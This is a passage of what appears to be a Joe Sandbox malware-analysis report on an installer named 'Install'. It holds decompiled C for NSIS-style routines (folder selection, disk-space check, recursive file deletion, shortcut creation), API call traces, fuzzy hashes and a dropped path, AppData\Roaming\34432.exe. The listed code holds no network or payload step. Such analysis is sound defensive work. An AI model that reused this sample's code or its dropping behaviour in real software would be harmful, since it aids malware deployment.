                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                            • String ID: {
                            • API String ID: 590372296-366298937
                            • Opcode ID: 943fc32418130b232fc7306fa704d0383798a9d724e6e480ce665c9b6ea9918b
                            • Instruction ID: 6b97441d6f4cfe62a880681573964a63c423f2dd70b2063085686802d9cc5617
                            • Opcode Fuzzy Hash: 943fc32418130b232fc7306fa704d0383798a9d724e6e480ce665c9b6ea9918b
                            • Instruction Fuzzy Hash: C8B169B1900608FFDB119FA0DD85AAE7B79FB44355F00803AFA41BA1A0C7755E51DF58
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 78%
                            			E0040498A(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                            				signed int _v8;
                            				signed int _v12;
                            				long _v16;
                            				long _v20;
                            				long _v24;
                            				char _v28;
                            				intOrPtr _v32;
                            				long _v36;
                            				char _v40;
                            				unsigned int _v44;
                            				signed int _v48;
                            				WCHAR* _v56;
                            				intOrPtr _v60;
                            				intOrPtr _v64;
                            				intOrPtr _v68;
                            				WCHAR* _v72;
                            				void _v76;
                            				struct HWND__* _v80;
                            				void* __ebx;
                            				void* __edi;
                            				void* __esi;
                            				intOrPtr _t82;
                            				long _t87;
                            				short* _t89;
                            				void* _t95;
                            				signed int _t96;
                            				int _t109;
                            				signed short _t114;
                            				signed int _t118;
                            				struct HWND__** _t122;
                            				intOrPtr* _t138;
                            				WCHAR* _t146;
                            				unsigned int _t150;
                            				signed int _t152;
                            				unsigned int _t156;
                            				signed int _t158;
                            				signed int* _t159;
                            				signed int* _t160;
                            				struct HWND__* _t166;
                            				struct HWND__* _t167;
                            				int _t169;
                            				unsigned int _t197;
                            
                            				_t156 = __edx;
                            				_t82 =  *0x42c240;
                            				_v32 = _t82;
                            				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x436000;
                            				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                            				if(_a8 == 0x40b) {
                            					E00405B81(0x3fb, _t146);
                            					E004067C4(_t146);
                            				}
                            				_t167 = _a4;
                            				if(_a8 != 0x110) {
                            					L8:
                            					if(_a8 != 0x111) {
                            						L20:
                            						if(_a8 == 0x40f) {
                            							L22:
                            							_v8 = _v8 & 0x00000000;
                            							_v12 = _v12 & 0x00000000;
                            							E00405B81(0x3fb, _t146);
                            							if(E00405F14(_t186, _t146) == 0) {
                            								_v8 = 1;
                            							}
                            							E0040653D(0x42b238, _t146);
                            							_t87 = E0040690A(1);
                            							_v16 = _t87;
                            							if(_t87 == 0) {
                            								L30:
                            								E0040653D(0x42b238, _t146);
                            								_t89 = E00405EB7(0x42b238);
                            								_t158 = 0;
                            								if(_t89 != 0) {
                            									 *_t89 = 0;
                            								}
                            								if(GetDiskFreeSpaceW(0x42b238,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                            									goto L35;
                            								} else {
                            									_t169 = 0x400;
                            									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                            									asm("cdq");
                            									_v48 = _t109;
                            									_v44 = _t156;
                            									_v12 = 1;
                            									goto L36;
                            								}
                            							} else {
                            								_t159 = 0;
                            								if(0 == 0x42b238) {
                            									goto L30;
                            								} else {
                            									goto L26;
                            								}
                            								while(1) {
                            									L26:
                            									_t114 = _v16(0x42b238,  &_v48,  &_v28,  &_v40);
                            									if(_t114 != 0) {
                            										break;
                            									}
                            									if(_t159 != 0) {
                            										 *_t159 =  *_t159 & _t114;
                            									}
                            									_t160 = E00405E58(0x42b238);
                            									 *_t160 =  *_t160 & 0x00000000;
                            									_t159 = _t160;
                            									 *_t159 = 0x5c;
                            									if(_t159 != 0x42b238) {
                            										continue;
                            									} else {
                            										goto L30;
                            									}
                            								}
                            								_t150 = _v44;
                            								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                            								_v44 = _t150 >> 0xa;
                            								_v12 = 1;
                            								_t158 = 0;
                            								__eflags = 0;
                            								L35:
                            								_t169 = 0x400;
                            								L36:
                            								_t95 = E00404E27(5);
                            								if(_v12 != _t158) {
                            									_t197 = _v44;
                            									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                            										_v8 = 2;
                            									}
                            								}
                            								if( *((intOrPtr*)( *0x433edc + 0x10)) != _t158) {
                            									E00404E0F(0x3ff, 0xfffffffb, _t95);
                            									if(_v12 == _t158) {
                            										SetDlgItemTextW(_a4, _t169, 0x42b228);
                            									} else {
                            										E00404D46(_t169, 0xfffffffc, _v48, _v44);
                            									}
                            								}
                            								_t96 = _v8;
                            								 *0x434fa4 = _t96;
                            								if(_t96 == _t158) {
                            									_v8 = E0040140B(7);
                            								}
                            								if(( *(_v32 + 0x14) & _t169) != 0) {
                            									_v8 = _t158;
                            								}
                            								E004044BB(0 | _v8 == _t158);
                            								if(_v8 == _t158 &&  *0x42d258 == _t158) {
                            									E004048E3();
                            								}
                            								 *0x42d258 = _t158;
                            								goto L53;
                            							}
                            						}
                            						_t186 = _a8 - 0x405;
                            						if(_a8 != 0x405) {
                            							goto L53;
                            						}
                            						goto L22;
                            					}
                            					_t118 = _a12 & 0x0000ffff;
                            					if(_t118 != 0x3fb) {
                            						L12:
                            						if(_t118 == 0x3e9) {
                            							_t152 = 7;
                            							memset( &_v76, 0, _t152 << 2);
                            							_v80 = _t167;
                            							_v72 = 0x42d268;
                            							_v60 = E00404CE0;
                            							_v56 = _t146;
                            							_v68 = E0040657A(_t146, 0x42d268, _t167, 0x42ba40, _v12);
                            							_t122 =  &_v80;
                            							_v64 = 0x41;
                            							__imp__SHBrowseForFolderW(_t122);
                            							if(_t122 == 0) {
                            								_a8 = 0x40f;
                            							} else {
                            								__imp__CoTaskMemFree(_t122);
                            								E00405E0C(_t146);
                            								_t125 =  *((intOrPtr*)( *0x434f10 + 0x11c));
                            								if( *((intOrPtr*)( *0x434f10 + 0x11c)) != 0 && _t146 == 0x440800) {
                            									E0040657A(_t146, 0x42d268, _t167, 0, _t125);
                            									if(lstrcmpiW(0x432ea0, 0x42d268) != 0) {
                            										lstrcatW(_t146, 0x432ea0);
                            									}
                            								}
                            								 *0x42d258 =  *0x42d258 + 1;
                            								SetDlgItemTextW(_t167, 0x3fb, _t146);
                            							}
                            						}
                            						goto L20;
                            					}
                            					if(_a12 >> 0x10 != 0x300) {
                            						goto L53;
                            					}
                            					_a8 = 0x40f;
                            					goto L12;
                            				} else {
                            					_t166 = GetDlgItem(_t167, 0x3fb);
                            					if(E00405E83(_t146) != 0 && E00405EB7(_t146) == 0) {
                            						E00405E0C(_t146);
                            					}
                            					 *0x433ed8 = _t167;
                            					SetWindowTextW(_t166, _t146);
                            					_push( *((intOrPtr*)(_a16 + 0x34)));
                            					_push(1);
                            					E00404499(_t167);
                            					_push( *((intOrPtr*)(_a16 + 0x30)));
                            					_push(0x14);
                            					E00404499(_t167);
                            					E004044CE(_t166);
                            					_t138 = E0040690A(8);
                            					if(_t138 == 0) {
                            						L53:
                            						return E00404500(_a8, _a12, _a16);
                            					} else {
                            						 *_t138(_t166, 1);
                            						goto L8;
                            					}
                            				}
                            			}

                            Address column of the decompiled function E0040498A (per-statement addresses from 0x0040498a to 0x00404cc5); its alignment with the C-code statements above was lost in extraction.
                            0x004049d3
                            0x004049e0
                            0x004049e9
                            0x004049f6
                            0x004049f6
                            0x004049fd
                            0x00404a03
                            0x00404a0c
                            0x00404a0f
                            0x00404a12
                            0x00404a1a
                            0x00404a1d
                            0x00404a20
                            0x00404a26
                            0x00404a2d
                            0x00404a34
                            0x00404ccb
                            0x00404cdd
                            0x00404a3a
                            0x00404a3d
                            0x00000000
                            0x00404a3d
                            0x00404a34

                            APIs
                            • GetDlgItem.USER32 ref: 004049D9
                            • SetWindowTextW.USER32(00000000,?), ref: 00404A03
                            • SHBrowseForFolderW.SHELL32(?), ref: 00404AB4
                            • CoTaskMemFree.OLE32(00000000), ref: 00404ABF
                            • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Roaming\34432.exe,0042D268,00000000,?,?), ref: 00404AF1
                            • lstrcatW.KERNEL32(?,C:\Users\user\AppData\Roaming\34432.exe), ref: 00404AFD
                            • SetDlgItemTextW.USER32 ref: 00404B0F
                              • Part of subcall function 00405B81: GetDlgItemTextW.USER32 ref: 00405B94
                              • Part of subcall function 004067C4: CharNextW.USER32(?,*?|<>/":,00000000,00000000,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406827
                              • Part of subcall function 004067C4: CharNextW.USER32(?,?,?,00000000,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406836
                              • Part of subcall function 004067C4: CharNextW.USER32(?,00000000,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040683B
                              • Part of subcall function 004067C4: CharPrevW.USER32(?,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,?,00403508,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 0040684E
                            • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,?,00000001,0042B238,?,?,000003FB,?), ref: 00404BD2
                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BED
                              • Part of subcall function 00404D46: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
                              • Part of subcall function 00404D46: wsprintfW.USER32 ref: 00404DF0
                              • Part of subcall function 00404D46: SetDlgItemTextW.USER32 ref: 00404E03
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                            • String ID: A$C:\Users\user\AppData\Roaming\34432.exe
                            • API String ID: 2624150263-3588490
                            • Opcode ID: 1288a594b8de571b7fe9c44f6f376bcff87d9ab289b7fbb3a41ad597db7e4874
                            • Instruction ID: a81e8b8b6ddc8ea4f7a7a45a10ce21cc850824e22f7b82fba9ad49fead82d7d1
                            • Opcode Fuzzy Hash: 1288a594b8de571b7fe9c44f6f376bcff87d9ab289b7fbb3a41ad597db7e4874
                            • Instruction Fuzzy Hash: CBA191B1900208ABDB119FA6DD45AAFB7B8EF84314F10803BF601B62D1D77C9A41CB6D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 98%
                            			E00405C49(void* __eflags, signed int _a4, signed int _a8) {
                            				signed int _v8;
                            				signed int _v12;
                            				short _v556;
                            				short _v558;
                            				struct _WIN32_FIND_DATAW _v604;
                            				signed int _t38;
                            				signed int _t52;
                            				signed int _t55;
                            				signed int _t62;
                            				void* _t64;
                            				signed char _t65;
                            				WCHAR* _t66;
                            				void* _t67;
                            				WCHAR* _t68;
                            				void* _t70;
                            
                            				_t65 = _a8;
                            				_t68 = _a4;
                            				_v8 = _t65 & 0x00000004;
                            				_t38 = E00405F14(__eflags, _t68);
                            				_v12 = _t38;
                            				if((_t65 & 0x00000008) != 0) {
                            					_t62 = DeleteFileW(_t68);
                            					asm("sbb eax, eax");
                            					_t64 =  ~_t62 + 1;
                            					 *0x434f88 =  *0x434f88 + _t64;
                            					return _t64;
                            				}
                            				_a4 = _t65;
                            				_t8 =  &_a4;
                            				 *_t8 = _a4 & 0x00000001;
                            				__eflags =  *_t8;
                            				if( *_t8 == 0) {
                            					L5:
                            					E0040653D(0x42f270, _t68);
                            					__eflags = _a4;
                            					if(_a4 == 0) {
                            						E00405E58(_t68);
                            					} else {
                            						lstrcatW(0x42f270, L"\\*.*");
                            					}
                            					__eflags =  *_t68;
                            					if( *_t68 != 0) {
                            						L10:
                            						lstrcatW(_t68, 0x40a014);
                            						L11:
                            						_t66 =  &(_t68[lstrlenW(_t68)]);
                            						_t38 = FindFirstFileW(0x42f270,  &_v604);
                            						_t70 = _t38;
                            						__eflags = _t70 - 0xffffffff;
                            						if(_t70 == 0xffffffff) {
                            							L26:
                            							__eflags = _a4;
                            							if(_a4 != 0) {
                            								_t30 = _t66 - 2;
                            								 *_t30 =  *(_t66 - 2) & 0x00000000;
                            								__eflags =  *_t30;
                            							}
                            							goto L28;
                            						} else {
                            							goto L12;
                            						}
                            						do {
                            							L12:
                            							__eflags = _v604.cFileName - 0x2e;
                            							if(_v604.cFileName != 0x2e) {
                            								L16:
                            								E0040653D(_t66,  &(_v604.cFileName));
                            								__eflags = _v604.dwFileAttributes & 0x00000010;
                            								if(__eflags == 0) {
                            									_t52 = E00405C01(__eflags, _t68, _v8);
                            									__eflags = _t52;
                            									if(_t52 != 0) {
                            										E0040559F(0xfffffff2, _t68);
                            									} else {
                            										__eflags = _v8 - _t52;
                            										if(_v8 == _t52) {
                            											 *0x434f88 =  *0x434f88 + 1;
                            										} else {
                            											E0040559F(0xfffffff1, _t68);
                            											E004062FD(_t67, _t68, 0);
                            										}
                            									}
                            								} else {
                            									__eflags = (_a8 & 0x00000003) - 3;
                            									if(__eflags == 0) {
                            										E00405C49(__eflags, _t68, _a8);
                            									}
                            								}
                            								goto L24;
                            							}
                            							__eflags = _v558;
                            							if(_v558 == 0) {
                            								goto L24;
                            							}
                            							__eflags = _v558 - 0x2e;
                            							if(_v558 != 0x2e) {
                            								goto L16;
                            							}
                            							__eflags = _v556;
                            							if(_v556 == 0) {
                            								goto L24;
                            							}
                            							goto L16;
                            							L24:
                            							_t55 = FindNextFileW(_t70,  &_v604);
                            							__eflags = _t55;
                            						} while (_t55 != 0);
                            						_t38 = FindClose(_t70);
                            						goto L26;
                            					}
                            					__eflags =  *0x42f270 - 0x5c;
                            					if( *0x42f270 != 0x5c) {
                            						goto L11;
                            					}
                            					goto L10;
                            				} else {
                            					__eflags = _t38;
                            					if(_t38 == 0) {
                            						L28:
                            						__eflags = _a4;
                            						if(_a4 == 0) {
                            							L36:
                            							return _t38;
                            						}
                            						__eflags = _v12;
                            						if(_v12 != 0) {
                            							_t38 = E00406873(_t68);
                            							__eflags = _t38;
                            							if(_t38 == 0) {
                            								goto L36;
                            							}
                            							E00405E0C(_t68);
                            							_t38 = E00405C01(__eflags, _t68, _v8 | 0x00000001);
                            							__eflags = _t38;
                            							if(_t38 != 0) {
                            								return E0040559F(0xffffffe5, _t68);
                            							}
                            							__eflags = _v8;
                            							if(_v8 == 0) {
                            								goto L30;
                            							}
                            							E0040559F(0xfffffff1, _t68);
                            							return E004062FD(_t67, _t68, 0);
                            						}
                            						L30:
                            						 *0x434f88 =  *0x434f88 + 1;
                            						return _t38;
                            					}
                            					__eflags = _t65 & 0x00000002;
                            					if((_t65 & 0x00000002) == 0) {
                            						goto L28;
                            					}
                            					goto L5;
                            				}
                            			}


                            APIs
                            • DeleteFileW.KERNEL32(?,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405C72
                            • lstrcatW.KERNEL32(0042F270,\*.*), ref: 00405CBA
                            • lstrcatW.KERNEL32(?,0040A014), ref: 00405CDD
                            • lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CE3
                            • FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405CF3
                            • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405D93
                            • FindClose.KERNEL32(00000000), ref: 00405DA2
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                            • String ID: .$.$C:\Users\user\AppData\Local\Temp\$\*.*
                            • API String ID: 2035342205-4130279798
                            • Opcode ID: 159fa2acebf62d68cb64ea74fddd1b0ad159e4272dc91ddb014146492f4e8da9
                            • Instruction ID: 8b2ee76931e9ba666d6dc67a471f1b560bbb00ea1adf29c264b32972d7114dcf
                            • Opcode Fuzzy Hash: 159fa2acebf62d68cb64ea74fddd1b0ad159e4272dc91ddb014146492f4e8da9
                            • Instruction Fuzzy Hash: 3D41A130900A14BADB216B65CC8DABF7678DF81714F14817FF841B21D1D77C4A819EAE
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 100%
                            			E00406873(WCHAR* _a4) {
                            				void* _t2;
                            
                            				_t2 = FindFirstFileW(_a4, 0x4302b8);
                            				if(_t2 == 0xffffffff) {
                            					return 0;
                            				}
                            				FindClose(_t2);
                            				return 0x4302b8;
                            			}


                            APIs
                            • FindFirstFileW.KERNEL32(76CDFAA0,004302B8,0042FA70,00405F5D,0042FA70,0042FA70,00000000,0042FA70,0042FA70,76CDFAA0,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\), ref: 0040687E
                            • FindClose.KERNEL32(00000000), ref: 0040688A
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: Find$CloseFileFirst
                            • String ID:
                            • API String ID: 2295610775-0
                            • Opcode ID: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                            • Instruction ID: 67599a3b69382adcf67454a25bfea179debcebd0a6e2e92eb77ede12202c023a
                            • Opcode Fuzzy Hash: 86d0f84efe5cb21a5e65899ed37e92679b9de560e532c409a12d624e9ae3e839
                            • Instruction Fuzzy Hash: C3D012325192205FC3402B386E0C84B7A989F16331726CB76B4AAF51E0D7388C7387BD
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 67%
                            			E004021AA() {
                            				signed int _t52;
                            				void* _t56;
                            				intOrPtr* _t60;
                            				intOrPtr _t61;
                            				intOrPtr* _t62;
                            				intOrPtr* _t64;
                            				intOrPtr* _t66;
                            				intOrPtr* _t68;
                            				intOrPtr* _t70;
                            				intOrPtr* _t72;
                            				intOrPtr* _t74;
                            				intOrPtr* _t76;
                            				intOrPtr* _t78;
                            				intOrPtr* _t80;
                            				void* _t83;
                            				intOrPtr* _t91;
                            				signed int _t101;
                            				signed int _t105;
                            				void* _t107;
                            
                            				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
                            				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
                            				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
                            				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
                            				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
                            				_t52 =  *(_t107 - 0x20);
                            				 *(_t107 - 0x50) = _t52 & 0x00000fff;
                            				_t101 = _t52 & 0x00008000;
                            				_t105 = _t52 >> 0x0000000c & 0x00000007;
                            				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
                            				if(E00405E83( *((intOrPtr*)(_t107 - 0x44))) == 0) {
                            					E00402DA6(0x21);
                            				}
                            				_t56 = _t107 + 8;
                            				__imp__CoCreateInstance(0x4085f0, _t83, 1, 0x4085e0, _t56);
                            				if(_t56 < _t83) {
                            					L14:
                            					 *((intOrPtr*)(_t107 - 4)) = 1;
                            					_push(0xfffffff0);
                            				} else {
                            					_t60 =  *((intOrPtr*)(_t107 + 8));
                            					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x408600, _t107 - 0x38);
                            					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
                            					if(_t61 >= _t83) {
                            						_t64 =  *((intOrPtr*)(_t107 + 8));
                            						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
                            						if(_t101 == _t83) {
                            							_t80 =  *((intOrPtr*)(_t107 + 8));
                            							 *((intOrPtr*)( *_t80 + 0x24))(_t80, 0x441000);
                            						}
                            						if(_t105 != _t83) {
                            							_t78 =  *((intOrPtr*)(_t107 + 8));
                            							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
                            						}
                            						_t66 =  *((intOrPtr*)(_t107 + 8));
                            						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
                            						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
                            						if( *_t91 != _t83) {
                            							_t76 =  *((intOrPtr*)(_t107 + 8));
                            							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
                            						}
                            						_t68 =  *((intOrPtr*)(_t107 + 8));
                            						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
                            						_t70 =  *((intOrPtr*)(_t107 + 8));
                            						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
                            						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                            							_t74 =  *((intOrPtr*)(_t107 - 0x38));
                            							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
                            						}
                            						_t72 =  *((intOrPtr*)(_t107 - 0x38));
                            						 *((intOrPtr*)( *_t72 + 8))(_t72);
                            					}
                            					_t62 =  *((intOrPtr*)(_t107 + 8));
                            					 *((intOrPtr*)( *_t62 + 8))(_t62);
                            					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                            						_push(0xfffffff4);
                            					} else {
                            						goto L14;
                            					}
                            				}
                            				E00401423();
                            				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t107 - 4));
                            				return 0;
                            			}

                            Instruction addresses (the per-line address column of the listing above, flattened by extraction):
                            0x004021b3 0x004021bd 0x004021c7 0x004021d1 0x004021dc 0x004021df 0x004021f9 0x004021fc 0x00402202 0x00402205 0x0040220f 0x00402213 0x00402213 0x00402218 0x00402229 0x00402231
                            0x004022e8 0x004022e8 0x004022ef 0x00402237 0x00402237 0x00402246 0x0040224a 0x0040224d 0x00402253 0x00402261 0x00402264 0x00402266 0x00402271 0x00402271 0x00402276 0x00402278
                            0x0040227f 0x0040227f 0x00402282 0x0040228b 0x0040228e 0x00402294 0x00402296 0x004022a0 0x004022a0 0x004022a3 0x004022ac 0x004022af 0x004022b8 0x004022be 0x004022c0 0x004022ce
                            0x004022ce 0x004022d1 0x004022d7 0x004022d7 0x004022da 0x004022e0 0x004022e6 0x004022fb 0x00000000 0x00000000 0x00000000 0x004022e6 0x004022f1 0x00402c2d 0x00402c39

                            APIs
                            • CoCreateInstance.OLE32(004085F0,?,00000001,004085E0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: CreateInstance
                            • String ID:
                            • API String ID: 542301482-0
                            • Opcode ID: c4fc3fa67b876c583326420a1baafc892d445f4eb77b454d3c92970a980d6818
                            • Instruction ID: 5977cb51530078b600b156af0050786de557c4b464dd586e6a5beaa7a0440451
                            • Opcode Fuzzy Hash: c4fc3fa67b876c583326420a1baafc892d445f4eb77b454d3c92970a980d6818
                            • Instruction Fuzzy Hash: A7411571A00208EFCF40DFE4C989E9D7BB5BF49348B20456AF905EB2D1DB799981CB94
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 39%
                            			E0040290B(short __ebx, short* __edi) {
                            				void* _t21;
                            
                            				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
                            					E00406484( *((intOrPtr*)(_t21 - 0xc)), _t8);
                            					_push(_t21 - 0x2b0);
                            					_push(__edi);
                            					E0040653D();
                            				} else {
                            					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
                            					 *__edi = __ebx;
                            					 *((intOrPtr*)(_t21 - 4)) = 1;
                            				}
                            				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t21 - 4));
                            				return 0;
                            			}

                            Instruction addresses (the per-line address column of the listing above, flattened by extraction):
                            0x00402923 0x0040293e 0x00402949 0x0040294a 0x00402a94 0x00402925 0x00402928 0x0040292b 0x0040292e 0x0040292e 0x00402c2d 0x00402c39

                            APIs
                            • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: FileFindFirst
                            • String ID:
                            • API String ID: 1974802433-0
                            • Opcode ID: db3e0d9fc2be9d26385cb54e60570df6e1e2b9abacb98404d6fb5f3e13457c69
